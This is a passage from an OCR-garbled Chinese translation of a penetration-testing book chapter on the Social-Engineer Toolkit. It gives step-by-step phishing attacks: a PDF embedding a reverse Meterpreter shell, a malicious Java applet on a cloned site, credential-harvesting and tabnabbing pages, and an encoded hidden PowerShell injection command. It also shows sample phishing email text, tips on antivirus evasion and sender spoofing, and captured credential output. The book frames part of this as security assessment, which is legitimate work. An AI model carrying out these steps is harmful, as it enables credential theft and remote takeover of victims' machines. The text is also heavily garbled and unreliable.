everything for you (option 1), the second is to create your own FileFormat 
payload and use it in your own attack. Either way, good Luck and enjoy: 


1) Perform a Mass Email Attack 
72) Create a FileFormat Payload 
3) Create a Social-Engineering Template 


图 7.3 SEToolkit 的 网 络 钓鱼 攻击 子 菜单 
选择 1 进行 一 次 大 量 email 攻 击 ， 然 后 会 显示 多 个 攻击 载 倚 的 列表 ， 如 图 7.4 所 示 。 


最 有 效 的 攻击 方式 之 一 是 选项 15) Adobe PDF Embedded EXE Social Engineering (fEPDFFRERANRIVETEEFRBJTEZS TL 
fe) 。 但 是 ， 攻 击 方式 的 选取 随 着 攻击 者 对 目标 的 了 解 而 改变 ,攻击 者 对 攻击 目标 的 了 解 取决 于 信息 收集 阶段 。 


当 攻 击 者 决定 选择 目 己 的 PDF ， 或 者 用 一 个 内 府 的 空白 PDF 文档 进行 攻击 时 ， 如 图 7.5 所 示 ， 选 择 2 加 载 内 欧 空 日 载 傈 。 然 
后 ， 攻 击 者 将 会 锐 提 示 选 择 载 何 。 
通过 在 多 个 网 络 中 测试 ， 友 现 选 项 1 和 选项 2 是 最 可 靠 的 载 何 (Window Reverse TCP shell (Windowsiž TCP) 、 


Windows Meterpreter Reverse TCP (WindowsBSMeterpreteriZ[E]TCP) ) 。 在 本 次 实例 中 ， 选 择 Windows Meterpreter 
Reverse TCP。 在 该 选项 中 ， 当 PDF 被 打开 时 ， 会 执行 一 个 逆向 shell， 连 接 攻 击 者 的 系统 。 


ee ok oc PAYLOADS 3 HE oe dic dc c oj oc oe Kc 


1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 

2) SET Custom Written Document UNC LM SMB Capture Attack 

3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 
4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087) 
5) Adobe Flash Player "Button" Remote Code Execution 

6) Adobe CoolType SING Table "uniqueName" Overflow 

1) Adobe Flash Player "newfunction" Invalid Pointer Use 

8) Adobe Collab.collectEmailInfo Buffer Overflow 

9) Adobe Collab.getlcon Buffer Overflow 

18) Adobe JBIG2Decode Memory Corruption Exploit 

11) Adobe PDF Embedded EXE Social Engineering 

12) Adobe util.printf() Buffer Overflow 

13) Custom EXE to VBA (sent via RAR) (RAR required) 

14) Adobe U3D CLODProgressiveMeshDeclaration Array Üverrun 

15) Adobe PDF Embedded EXE Social Engineering (NOJS) 

16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 

17) Apple QuickTime PICT PnSize Buffer Overflow 

18) Nuance PDF Reader v6.80 Launch Stack Buffer Overflow 

19) Adobe Reader u3D Memory Corruption Vulnerability 
20) MSCOMCIL ActiveX Buffer Overflow (ms12-02/) 


图 7.4 email 攻 击 


[-] Default payload creation selected. SET will generate a normal PDF with embedded EXE. 


1. Use your own PDF for attack 
2. Use built-in BLANK PDF for attack 


et:payloads»2 
1) Windows Reverse TCP Shell spawn a command shell on victim and send back to attacker 
2) Windows Meterpreter Heverse ICP spawn a meterpreter shell on victim and send back to attacker 
3) Windows Reverse VNC DLL | Spawn a VNC server on victim and send back to attacker 
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline 
5) Windows Meterpreter Reverse TCP (X64) Connect back to the attacker (Windows x64), Meterpreter 
6) Windows Shell Bind TCP (X64) Execute payload and create an accepting port on remote system 
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter | 


图 7.5 ”在 PDF 中 内 入 可 执行 程序 攻击 


在 隐蔽 性 比 可 靠 性 更 重要 的 环境 下 ，Windows Meterpreter Reverse HTTPS (Windows 的 Meterpreter 反 向 HTTPS) 是 最 


主 的 选择 。 
SEToolkit 将 会 提示 监听 载荷 (攻击 者 的 IP 地 址 ) 和 监听 端口 ， 默 认为 443。 
下 一 个 菜单 提示 修改 PDF 文件 的 文件 名 ; moo.pdf 是 默认 的 名 称 ， 如 图 7.6 所 示 。 


默认 的 名 字 不 会 吸引 潜在 的 受害 者 打开 该 文件 ， 而 且 它 可 能 会 被 确定 为 客 尸 端 安 全 。 因 为 这 些 原 因 ， 文 件 名 应 改 。 这 个 名 字 
应 该 反映 出 被 攻击 的 天 注 趣 向 。 例 如 ， 如 果 你 的 目标 是 金融 集团 ， 那 么 可 将 PDF 文 件 的 标题 命名 为 “税法 修正 案 ”。 


你 现在 可 以 选择 攻击 一 个 单一 的 电子 邮件 地 址 ， 或 群 友 邮件 (例如 ， 一 个 目标 公司 的 员工 名 单 ， 或 该 公司 的 特定 集团 ) 。 以 
选项 1 作为 一 个 例子 。 


SEToolkit 会 提示 使 用 预定 义 的 模板 ， 或 者 一 次 性 电子 邮件 草稿 模板 。 如 果 您 选择 了 一 个 预定 义 的 模板 ， 模 板 提 供 的 选项 如 
图 7.7 所 示 。 


set» IP address for the payload listener: 192.168.43.130 
set:payloads» Port to connect back on [443]: 
[-] Defaulting to port 443. 
[-] Generating fileformat exploit... 
Payload creation complete. 
All payloads get sent to the /root/.set/template.pdf directory 
[-] As an added bonus, use the file-format creator in SET to create your attachm 


Hight now the attachment will be imported with filename of 'template.whatever 


Do you want to rename the file? 


example Enter the new filename: moo.pdf 


l. Keep the filename, I don't care. 
2. Rename the file, I want to be cool. 


图 7.6 ”修改 PDF 文件 名 


Do you want to use a predefined template or craft 
4 one time email template. 


1l. Pre-Defined Template 
2. One-Time Use Email Template 


Computer Issue 
Order Confirmation 
10: Status Report 
set :phishing»l0 
jiishing»- Send email to:johnütarget.com 


set:phishind»l 

[-] Available templates: 

1: WOAAAA!!!!!11!1!!] This is crazy. 
2: Dan Brown's Angels & Demons 

3: Strange internet usage from your computer 
4: How Long has it been? 

o: Baby Pics 

6: Have you seen this? 

/: New Update 

8: 

g- 


图 7.7 使 用 预定 义 邮件 模板 


一 种 有 效 的 社会 工程 攻击 是 针对 目标 写 草 稿 }) 因此 ， 选 择 选 项 2， 使 用 一 次 性 电子 邮件 模板 (One-Time Use Email 
Template) ， 创 建 一 个 一 次 性 电子 邮件 模板 ， 如 图 7.8 所 示 。 


iing»2 
nishing» Subject of the email:New email server 
[p] :pg> Send the message as html or plain? 'h' 


r 了 or 


n for a new line. 


Control«c when Tinished:n, hit return 


Next line of the body: The mail server will be replaced today with 
Next Line of the body: a new version that is faster and (finally) 
Next Line of the body: has more storage capacity. 

Next line of the body: Please review the attached document, which 
Next Line of the body: outlines changes you must make to access 

Next line of the body: your account. You must make these changes to 
Next line of the body: ensure uninterrupted access to your email. 
Next Line of the body: Bob Smith 

Next Line of the body: Senior Manger 


图 7.8 使 用 一 次 性 邮件 模板 


你 有 两 种 选择 友 起 攻击 : (1) 用 你 目 己 的 Gmail 账 尸 ， (2) 使 用 目 己 的 服务 器 或 开放 中 继 。 如 果 你 使 用 一 个 Gmail 账户， 


它 的 攻击 可 能 失败 ， 这 时 ， 你 将 收 到 以 下 消息 : 


[! ]Unable to deliver email.Printing exceptions message below, this is most likely due to an illegal 
attachment.If using GMAIL they inspect PDFs and it is most likely getting caught. (无 法 发 送 电 子 邮 件 。 下 面 打印 异 
常 消 息 ， 这 最 有 可 能 是 因为 非法 附件 。 如 果 使 用 Gmail1， 他 们 检查 PDF 文件 ， 并 且 ， 它 最 有 可 能 被 抓 。) 


Gmail 检查 发 送 的 邮件 的 恶意 文件 ， 能 非常 有 效 地 识别 setoolkit 和 metasploit 框 架 产生 的 载荷 。 如 果 你 必须 使 用 Gmail 发 送 
有 效 载 何 ， 首 先 用 Veil-Evasion 编 码 。 


建议 您 使 用 sendmail 选 项 友 送 可 执行 文件 ;进一步 ， 它 允许 你 有 恶搞 电子 邮件 的 来 源 ， 使 它 看 起 来 好 像 来 自 受 信任 的 来 源 。 


目标 将 收 到 以 下 电子 邮件 ， 如 图 7.9 所 示 。 


robert. beggs G@digitaldefence.ca 


~] Message | W) template.doc (230 B) 


The email server will be upgraded today after hours. 


The new server will be faster, have improved anti-virus, and give everyone more storage 
space for their emails. 

Please review the attached document for the changes that you will have to make BEFORE you 
can access your email tomorrow morning. 


Jon Smith, Network Manager 
DigitalDefence 
###-HHH-FHEH (office) 


图 7.9 ”使 用 一 次 性 邮件 模板 


为 了 确保 电子 邮件 是 有 效 的， 攻击 者 应 该 天 注 以 下 几 损 : 


.内 容 应 该 提供 一 个 “胡萝卜 ”( 新 的 服务 器 更 快 ， 反 病毒 措施 有 改进 ) 和 一 个 " 棒 ”( 在 你 可 以 访问 你 的 电子 邮件 之 前 ， 你 不 得 不 做 一 些 更 
BO 。 大 多 数 人 都 会 立即 采取 行动 ， 特 别 是 在 影响 到 他 们 的 时 候 。 


:在 前 面 给 出 的 例子 中 ， 所 附 文件 的 标题 是 template .doc。 在 真实 的 场景 中 ， 这 将 改变 Email instructions.doc. 


-确保 你 的 拼写 和 语法 是 正确 的 ， 并 且 在 信息 的 语调 匹配 信息 的 内 容 。 
qe c emu a UNDE 如 果 目 标的 组 织 很 小 ， 你 可 能 要 恶搞 真正 的 人 的 名 字 ， 并 且 发 送 电 子 邮 件 给 一 个 小 组 ， 一 般 不 与 


Ie 


包含 一 个 电话 写 码 ， 它 能 使 邮件 看 起 来 更 \ 官 方 ”, 并 且 ， 有 不 同 的 使 用 商业 语 首 的 IP 解 决 方案 ， 获 得 本 地 区 写 短 期 的 电话 号码 。 


一 旦 攻击 的 电子 邮件 友 送 到 目标 ， 成 功 激活 ( 收 件 人 局 动 可 执行 文件 ) 将 创建 一 个 反 向 的 Meterpreter 隧 道 到 攻击 者 的 系 
统 。 攻 击 者 会 利用 Meterpreter 和 其 他 工具 进行 典型 的 后 期 利用 活动 。 


7.1.2 ”使 用 网 站 攻击 向 量 一 一 Java 小 程序 攻击 万 汉 


Java 小 程序 攻击 方法 (Java Applet Attack Method) ， 是 使 用 一 个 受 感染 的 Java 小 程序 将 恶意 应 用 程序 加 载 到 目标 系统 
中 。 这 种 攻击 受到 许多 攻击 者 的 青睐 ， 因 为 它 是 非常 可 靠 的 ， 它 对 Windows、Linux、Mac OS X 系 统 都 是 有 效 的 。 


要 发 动 攻击 ， 打 开 SEToolkit， 并 从 主 菜单 选择 选项 2) Website Attack Vectors (网 站 攻击 向 量 ) ， 然 后 再 选择 选项 
1) Java Applet Attack Method， 以 启动 初始 菜单 ， 如 图 7.10 所 示 。 


The first method will allow SEI to import a list of pre-defined web 
applications that it can utilize within the attack. 


Tne second method will completely clone a website of your choosing 
and allow you to utilize the attack vectors within the completely 
same web application you were attempting to clone. 


The third method allows you to import your own website, note that you 
should only have an index.html when using the import website 
functionality. 


1) Web Templates 
2) Site Cloner 
3) Custom Import 


图 7.10 Java) f FAE 


网 页 模板 的 选项 有 Java Required, Gmail, Google, Facebook, Twitter#]Yahoo, Java Required 的 页 面 ， 如 图 7.11 所 
té 


7K, 8 


— Search the website — — < 
ava Required! Search 


Home Services About Help Links 


Welcome to the website, you must hava Java in order to view this page properly. Ensure that the Microsoft 
signed Java box that pops up is accepted to load the site content. 


Words from our CEO "Java Required to view content." 
Instructions to view the website: 


1. A pop-up box will prompt. please hit "Yes", This may take a few 
moments. 

2. This pop-up is signed through the Microsoft Corporation and will 
provide you with necessary updates to view the site. 

3. Once you have accepted, wait about 10 to 15 seconds and the page 
will load. 

You must first click "Run" for the signed Java component from 
Microsoft in order to view our site successfullv. 


Welcome to the site! This site requires 
Java m order to run properly, 


图 7.11 Java Required 71 面 
你 也 可 以 选择 克隆 一 个 现 有 的 网 站 ， 比 如 目标 企业 网 站 。 


经 过 选择 ， 攻 击 者 会 锐 提 示 ， 是 否 使 用 Port/NAT 转 友 ， 并 提供 有 反 向 连接 的 攻击 机 IP 地 址 ， 如 图 7.12 所 示 。 


[-] NAT/Port Forwarding can be used in the cases where your SEI machine is 

[-] not externally exposed and may be a different IP address than your reverse 
istener. 

set» Are you using NAT/Port Forwarding [yes|no]: no 

[-] Enter the IP address of your interface IP or if your using an external IP, 
hat 

[-] will be used for the connection back and to house the web server [your intel 
face address) 

connection:192.168.43.130 or hostname for the reverse c 

[-] SEI supports both HITP and HITPS 

[-] Example: http://www.thisisafakesite.com 
aldefence.cak» Enter the url to clone:http://www.digit 


图 7.12 ”是否 使 用 Port/NAT 和 转发 


sprmoolkit 不 能 理 好 换行 ， 这 是 第 见 的 ， 典 型 的 啊 应 将 换行 并 履 善 命令 行 的 一 部 分 。 
提供 所 需 的 URL 后 ，SEToolkit 将 启动 网 站 的 克隆 过 程 ， 如 图 7.13 所 示 。 完 成 后 ， 应 用 程序 将 开始 产生 有 效 载荷 和 支持 文件 
(jar 归 档 和 克隆 index.html 文 件 ) 。 


[*] Cloning the website: http://www.digitaldefence.ca 

[+] This could take a little bit 

[*] Injecting Java Applet attack into the newly cloned website. 
[*] Filename obfuscation complete. Payload name is: nAo2ZBQKTSA 
[+] Malicious java applet website prepped for deployment 


图 7.13 ”克隆 网 站 


下 一 阶段 包括 选择 有 效 载 倚 。 如 果 隐 身 是 特别 重要 的 ， 使 用 选项 17 选 择 一 个 可 执行 的 、 已 经 使 用 veil 编 码 的 载 何 ， 如 下 图 
7.14 所 示 。 


选择 编码 选项 ， 绕 过 在 目标 系统 上 的 本 地 杀毒 系统 ; 最 有 效 的 是 第 4 个 选项 ，Backdoored Executable (Ai JEF) ， 如 图 
7.15 所 示 。 


该 应 用 程序 将 提示 监听 端口 ， 然 后 开始 为 受害 者 的 机 器 生成 通用 端口 (53、25、80、443 等 ) 的 代码 ， 如 图 7.16 所 示 。 


接 下 来 是 社会 工程 阶段 ， 攻 击 者 必须 说 服 目 标 人 群 连接 到 监听 系统 的 IP 地 址 。 如 果 目 标 进入 该 系统 ， 他 们 将 被 定向 到 该 监听 
器 的 克隆 位 置 上 。 


该 网 站 将 对 目标 人 群 提 出 安全 警告 ， 如 图 7.17 所 示 ， 表 明 如 果 要 访问 该 网 站 ， 有 一 个 应 用 程序 需要 执行 。 


如 果 此 人 选择 执行 该 应 用 程序 ， 则 将 在 其 计算 机 和 攻击 者 的 计算 机 之 间 形 成 反 向 外 这 (取决 于 选 定 的 负载 ) 。 


1) Windows Shell Reverse TCP Spawn a command shell on victim an, 
d send back to attacker 
2) Windows Reverse ICP Meterpreter Spawn a meterpreter shell on victi] 
m and send back to attacker 
3) Windows Reverse TCP VNC DLL Spawn a VNC server on victim and si 
end back to attacker | 
4) Windows Bind Shell Execute payload and create an accel} 
pting port on remote system 
5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCI 
P Inline | 
6) Windows Shell Reverse ICP X64 Windows X64 Command Shell, Reverse! 
TCP Inline 
/] Windows Meterpreter Reverse [CP X64 Connect back to the attacker (Wind) 
ows x64), Meterpreter 
8) Windows Meterpreter All Ports Spawn a meterpreter shell and find 
a port home (every port) 
9) Windows Meterpreter Reverse HITPS Tunnel communication over HIIP usi] 
ng SSL and use Meterpreter 
10) Windows Meterpreter Reverse DNS Usa a hostname instead of an IP ad 
dress and spawn Meterpreter 
11) SE ToolKit Interactive Shell Custom interactive reverse toolkit] 
designed for SET \ 
12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES 
encryption support 
13) RATTE HI TP Tunneling Payload security bypass payload that will 
tunnel all comms over HTTP 
14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter paylo| 
ad through shellcodeexec 
15) PyInjector Shellcode Injection This will drop a meterpreter paylol 
ad through PyInjector 
16) MultiPyInjector Shellcode Injection This will drop multiple Metasploit) 
payloads via memory 
1/) Import your own executable Specify a path for your own executi 


able | 


图 7.14 选择 载荷 


Select one of the below, ‘backdoored executable’ is typically the best. However,, 
most still get picked up by AV. You may need to do additional packing/crypting 
in order to get around basic AV detection. 


1) shikata ga nai 

2) No Encoding 

3) Multi-Encoder 

4] Backdoored Executable 


图 7.15 ”选择 编码 


set:encoding»4 
set:payloads- PORT of the Listener [443]: 
Generating x86-based powershell injection code for port: 22 
Generating x86-based powershell injection code for port: 53 
Generating x86-based powershell injection code for port: 443 
Generating x86-based powershell injection code for port: 21 
Generating x86-based powershell injection code for port: 25 
Finished generating powershell injection bypass. 
Encoded to bypass execution restriction policy... 
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds... 
Backdoor completed successfully. Payload is now hidden within a legit execu 


图 7.16 “生成 端口 代码 


Security Warning | x 


Do you want to run this application? 


Name: Verified Trusted and Secure (SECURE) 
Publisher: UNKNOWN 
Location:  http://192. 168.43. 130/Signed_Update. jar 


Running applications by UNKNOWN publishers will be blocked in a future 
elease because it is potentially unsafe and a security risk. 


Risk: This application will run with unrestricted access which may put your computer and personal 
information at risk. The information provided is unreliable or unknown so it is recommended 
not to run this application unless you are familiar with its source 


More Information 


act the box below, then click Run to start the applicatio 


这 两 种 攻击 展示 了 不 同 的 攻击 方法 ， 通 过 这 两 种 方法 ，SEToolkit 使 用 反 向 外 壳 或 类 似 的 有 效 载荷 ， 获 得 目标 计算 机 的 控制 


权 。 攻 击 者 可 以 通过 多 种 方式 扩展 控制 ， 如 使 用 VNC 的 有 效 载 何 ， 或 放置 一 个 RATTE。 


然而 ， 这 些 攻击 是 侵入 性 的 ， 当 它 连 接 到 攻击 者 的 机 器 时 ， 反 向 外 壳 可 能 触 友 防火 墙 出 口 报 营 。 更 重要 的 是 ， 可 以 有 反 同 利用 
该 有 效 载 何 ， 确 定 攻击 者 的 信息 。 


最 后 ， 攻 击 的 目标 可 能 不 是 一 个 即时 的 入 侵 ， 相反， 攻击 者 可 能 希望 收集 用 户 凭 据 来 支持 后 续 的 攻击 ,或 在 多 个 地 方 的 互联 
网 上 重用 该 竺 证 。 下 面 我 们 介绍 一 下 和 凭据 收割 攻击 万 法 。 


7.1.3 ”使 用 网 站 攻击 向量 一 一 凭据 收割 攻击 万 法 


凭据 ， 通 剃 为 用 己 名 和 密码 ， 是 一 个 人 访问 网 络 、 计 算 系 统 和 数据 的 依据 。 攻 击 者 可 以 使 用 这 种 间接 信息 (登录 受害 者 的 
Gmail 账户， 友 送 电子 邮件 ， 帮 助攻 击 受 害 者 的 信任 连接 ) ， 或 直接 攻击 用 户 的 账 忆 。 这 种 攻击 与 广泛 重用 的 凭据 用 尸 高 度 相 
天 ， 典 型 情况 是 ， 一 个 用 户 通 单 在 多 个 地 方 重复 使 用 密码 。 


特别 珍贵 的 是 有 访问 特权 的 用 己任 证 ， 如 系统 管理 员 或 数据 库 管 理 员 ， 它 可 以 提供 给 攻击 者 访问 多 个 账 尸 和 数据 库 的 凭据 。 
SEToolkit 的 凭证 收割 攻击 ， 使 用 克隆 的 网 站 收集 凭据。 


要 发 动 攻 击 ， 从 主 菜单 中 选择 Website Attack Vectors (网 站 攻击 向 量 ) ， 然 后 选择 Credential Harvester Attack 
Method (凭据 收割 攻击 方法 ) 。 作 为 例子 ， 我 们 将 按照 菜单 选项 来 克隆 一 个 网 站 ， 如 Facebook。 


接着 ,目标 地 址 必须 发 送 到 预定 目标 。 当 目标 点 击 链接 或 输入 IP 地 址 ， 会 出 现 一 个 克隆 页 面 ， 类 似 于 Facebook 的 登录 页 
面 ， 他 们 会 被 提示 输入 用 尸 名 和 密码 。 


一 旦 这 样 做 ， 用 户 将 被 重 定向 到 普通 的 脸谱 网 站 ， 在 那里 他 们 将 登录 到 目 己 的 账户 。 
在 后 人 台中， 他 们 的 访问 凭据 将 被 收集 并 转 友 给 攻击 者 。 在 监听 者 窗口 将 看 到 下 面 的 条 目 ， 如 图 7.18 所 示 。 


[*] WE GOT A HIT! Printing the output : 
PARAM: Lsd=AVpPLWN3S 

PARAM: display= 

PARAM: enable profile selector- 

PARAM: legacy return=1 

PARAM: next= 

PARAM: profile selector ids- 

PARAM: trynum=1 

PARAM: timezone-240 

PARAM: Lgnrnd-15111/ n/yx 

PARAM: L|gnjs-1381529483 

POSSIBLE USERNAME FIELD FOUND: email-srobert.beggsüdigitaldefence.ca! 
POSSIBLE PASSWORD FIELD FOUND: pass=password 


A718 收集 凭证 的 监听 者 窗口 
当 攻 击 者 已 经 完成 收集 凭据 后 ， 输 入 Ctrl+C， 在 /SET/reports/ 目 录 中 ， 将 产生 XML 和 HTML 两 种 格式 的 报告 。 


类 似 的 攻击 选择 是 Web Jacking Attack (网 页 顶 进 攻击 ) 。 当 受害 者 打开 攻击 者 的 链接 时 ， 他 们 会 见 到 一 个 页 面 通 天， 他 
们 选 定 的 页 面 已 经 被 删除 ， 如 图 7.19 所 示 。 


当 用 尸 点 击 链 接 到 新 的 位 置 ， 他 们 将 见 到 一 个 克隆 页 面 ， 似 乎 是 一 个 与 预期 相符 的 页 码 ， 如 图 7.20 所 示 ， 访 网 页 将 收获 他 们 


的 登录 凭据 。 


Address |&&] http://192.163.43. 130) v Go 


the new location. 


图 7.19 ”受害 者 见 到 的 页 面 


an] nhttp:jI192.168.43. 1 30yindex2.homl 


sign in Google 
Username 


Po 


Password 


Cant access your account? 


图 7.20 受害 者 见 到 的 克隆 页 面 


s 


Snes, 在 URIL 栏 的 地 址 不 是 谷歌 的 有 效 地 址 ， 大 多 数 用 户 都 知道 ， 如 果 他 们 查看 地 址 ， 这 个 地 址 是 错误 的 。 一 个 成 功 的 利用 ， 攻 击 者 
需要 一 个 合适 的 借口 或 故事 ， 使 受害 者 接受 不 寻 第 的 网 址 。 例 如 ， 有 发送 一 封 电子 邮件 给 一 组 非 撤 术 性 管理 者 的 目标 群 ， 宣 称 : “本 地 谷歌 邮件 
网 站 正在 减少 邮件 系统 的 延误 。 " 


凭证 收割 攻击 是 评估 企业 网 络 安全 的 一 个 很 好 的 工具 。 要 使 其 区 分 友 挥 作用 ， 访 组 织 必须 和 诈 移 搭 训 所 有 员工 识别 和 应 对 网 络 
钓鱼 攻击 。 大 约 2 周 后 ， 友 送 一 个 企业 学 围 内 的 电子 邮件 ,包含 一 些 明 显 的 错误 (不 正确 的 企业 忌 裁 名 或 包含 错误 地 址 的 地 址 
R) 和 一 个 链接 到 收获 凭据 的 程序 。 计 算 收 件 人 中 使 用 他 们 的 和 凭据 回应 的 百分比 ， 然 后 调整 培训 计划 ， 以 减少 这 一 比例 。 


7.14 ”使 用 网 站 攻击 向 量 一 一 标签 钓鱼 攻击 方法 


标签 钓鱼 (tabnabbing) 利用 用 尸 的 信任 ， 在 一 个 浏览 器 打开 的 标签 页 中 加 载 一 个 假 网 页 。 通 过 模拟 网 页 的 网 站 如 
Gmail、facebook 或 任何 其 他 网 站 友 布 的 数据 (通常 是 用 己 名 和 密码 ) ， 一 个 标签 钓鱼 攻击 可 以 收集 受害 者 的 凭据 。 社 会 工程 
工具 包 调 用 凭据 收割 攻击 ， 如 之 前 所 述 。 


为 了 发 动 这 次 攻击 ， 从 一 个 控制 台 提 示 符 局 动 社会 工程 工具 包 ， 然 后 选择 1) Social-Engineering Attacks。 在 下 一 个 荣 
中 ， 选 择 2) Website Attack Vectors。 最 后 ， 标 签 钓鱼 攻击 通过 选择 4) Tabnabbing Attack Method 来 启动 。 


当 攻 击 被 启动 时 ， 你 将 看 到 有 三 个 选项 来 生成 的 假 网 站 ， 假 网 站 用 来 收集 和 凭证。 攻击 者 可 以 i 上 setoolkit 导 入 一 个 预定 义 
Web 应 用 的 列表 ， 克 隆 一 个 网 站 (比如 Gmail) ， 或 者 导入 目 己 的 网 站 。 在 这 个 例子 中 ， 我 们 将 选择 2) Site Cloner (网 站 克 


隆 ) 。 
这 将 促使 攻击 者 进入 服务 器 将 友 布 的 IP 地 址 ， 这 通常 是 攻击 者 的 系统 的 IP 地 址 。 然 后 ， 攻 击 者 将 被 提示 输入 将 被 克隆 的 网 


址 。 在 图 7.21 中 ，Gmail 的 网 站 已 被 选中 。 


攻击 者 必须 使 用 社会 工程 ， 迟 使 受害 者 访问 地 址 上 后， 产生 返回 的 行动 (例如 ,缩短 URL) 。 受 害 者 会 收 到 一 个 消息 ， 该 网 站 
正在 加 载 (如 在 浏览 器 的 不 同 标签 下 攻击 脚本 加 载 克 隆 网 站 ， 如 图 7.21 所 示 ) . 


€ | 2J| W | http://192.168.0.102/ OD ~ C vy 192.168.0102 


Please wait while the site loads... 


图 7.21 加载 克 隆 网 站 


然后 ， 假 网 页 将 被 呈现 (虚假 的 IP 地 址 仍然 可 见 ) 。 如 果 用 尸 输入 他 们 的 用 尸 名 和 密码 ， 数 据 将 被 友 送 到 攻击 者 的 监听 器 。 
正如 你 在 图 7.22 中 看 到 的 那样 ， 它 捕获 了 用 户 名 和 密码 。 


IP address for the POST back in Harvester/Tabnabbing:192.168.0.102 
[-] SET supports both HTTP and HTTPS 

[-] Example: http://www.thisisafakesite.com 

set:webattack» Enter the url to clone:http://www.gmail.caom 


[+*+] Cloning the website: https://acccunts.google.com 
[*] This could take a little bit... 


The best way to use this attack is if username and password form 
fields are available. Regardless, this captures all POSTS on a website. 


[t] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs. 
[*] The Social-Engineer Toolkit Credential Harvester Attack 

[+] Credential Harvester is running on port 80 

[*; Information will be displayed to you as it arrives below: 


192.158.0.101 - - [30/Mar/2014 16:22:22] “GET / HTTP/1.1" 280 - 
192.168.0.101 - - [30/Mar/2014 16:22:22] “GET fsource.js HTTP/1.1" 200 - 
197.168.0.101 - - [30/Mar/2014 16:22:27] “GET /1ndex2.html HTTP/1.1" 208 - 


[*] WE GOT A HIT! Printing the output: 

PARAM: GALX=-ALULZXVb/@ 

PARAM: continue=https://accounts.qoogle.com/ManageAccount 

PARAM: followupshttps://accounts.goocle.com/ManageAccount 

PARAM:  utf8z:^ 

PARAM: bgresponse=!AQI_x9CEpc VtOESKBeAKPAUSUABAAxYG- yoEJMUic4ifLIzjb-P2Ab/J9rKw. 
PARAM: pstMsg=1 

PARAM: anConns 

PARAM: checkConnection- 

PARAM: checkedDomains=yout ube 

POSSIBLE USERNAME FIELD FOUND: Email-rooert.beggsüdigitaldefence.ca 
POSSIBLE PASSWORD FIELD FOUND: Passwo=password 

PARAM: sianlin-Sign«in 

PARAM: PersistentCookie=yes 

PARAM: rmShown=1 

[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. 


图 7.22 ”标签 钓鱼 攻击 捕获 用 户 名 和 密码 


7.1.5 ”使 用 网 站 攻击 同 量 一 一 综合 攻击 网 页 方法 


“玛丽 水 土 ”攻击 的 网 站 攻击 向 量 束 是 综合 攻击 网 页 万 法 (Multi-Attack Web Method) ， 它 允许 攻击 者 在 一 次 执行 几 种 
他 们 所 选 的 不 同 的 攻击 。 默 认 情 况 下 ， 所 有 的 攻击 都 是 被 禁用 的 ， 并 且 攻 击 者 选择 一 个 受害 者 ， 如 图 7.23 所 示 。 


Multi-Attack Web Attack Vector 


[ c opc nc opc opc ac pe cnp opc xc vc pc pc xc pc fC oc xe oc ope oe oc ope ope oe opc e ope oc oe pe ope ope ope pe opc ope ope pe ope ope ope ope oe ox ope ope ope e opc opc op oe «e ope ope oe spe oe o ] 


The multi attack vector utilizes each combination of attacks 
and allow the user to choose the method for the attack. Once 
you select one of the attacks, it will be added to your 
attack profile to be used to stage the attack vector. when 
your finished be sure to select the 'I'm finished' option. 


select which attacks you want to use: 


Java Applet Attack Method 

Metasploit Browser Exploit Method 

Credential Harvester Attack Method 

Tabnabbing Attack Method 

. Web Jacking Attack Method 

Use them all - A.K.A. ‘Tactical Nuke’ 

I'm finished and want to proceed with the attack 


-- C) Ul Ss uw KR) Fe 


99. Return to Main Menu 


图 7.23 ”选择 多 种 攻击 方法 进行 综合 攻击 


这 是 一 个 有 效 的 选择 ， 如 果 不 能 确定 攻击 对 目标 组 织 的 攻击 是 有 效 的 ; 攻击 者 会 先 选 择 一 名 员工 进行 攻击 ， 确 定 成 功 攻击 
后 ， 表 利用 这 些 万 法 攻击 其 他 员工 。 


7.2 ”使 用 PowerShel| 字 母 数字 的 shellcode 注 入 攻击 曝光 
社会 工程 学 工具 包 还 包含 基于 PowerShell 的 更 有 效 的 攻击 ， 适 用 于 所 有 微软 Vista 发 布 后 的 微软 操作 系统 。 因 为 PowerShell 
的 shellcode 可 以 很 容易 地 被 注入 到 目标 的 物理 内 存 中 ， 使 用 该 载体 的 攻击 不 会 触 友 病 毒 警 报 。 


为 了 使 用 SEToolkit 必 起 PowerShell 的 注入 攻击 ， 从 主 菜单 选择 1) Social-Engineering Attacks。 然 后 从 下 一 级 菜单 选择 
10) Powershell AttackVectors, 


这 会 给 攻击 者 四 种 攻击 类 型 以 供 选 择 ; 例如 ， 选 择 1， 使 用 PowerShell Alphanumeric Shellcode Injector, 


攻击 参数 ， 并 提示 攻击 者 输入 有 效 载荷 监听 器 的 地 址 ， 通 弟 是 攻击 者 的 地 址 。 当 这 个 已 被 输 入 ， 程 序 将 创建 利用 代 


这 将 设置 
并 开局 一 个 本 地 监听 器 。 


£5, 
PowerShell 展 开 攻 击 的 shellcode， 是 存储 在 /root/.set/reports/powershell/x86 powershell injection.txt 中 的 。 


当 攻 击 者 说 服 受 害 者 在 命令 提示 符 下 复制 x86_powershell_injection.txt 文 本 的 内 容 时 ， 攻 击 的 社会 工程 行为 发 生 ， 并 执行 
代码 ， 如 图 7.24 所 示 。 


Microsoft Windows [Version 6.1.7601] 
Copyright (C) 2009 Microsoft Corporation. All rights reserved. 


C:Mpowershell -nop -windows hidden -noni -enc 

JAAXACAAPOAGACCAJAB j ACAAPQAGACCAIWBbDAEQADAB SAEKADQBWAGSACGBOACg 
AGWADAA1 ACKAXQBWAHUAY GB SAGKAYWAGAHMACABhHAHQAaQB j ACAAZQB 4AHQAZQB 
aQB yAHQAdCQBhAGWAQQB s AGwAbWB j ACGASQBUAHQAUAB OAH TATAB SAHAAQQBKAGQ 
AGQAdwBTAGkAegB 1 ACWAIABlAGkAbGBOACAAZgB SAEEADAB SAGSAYWBhAHQAAOB, 
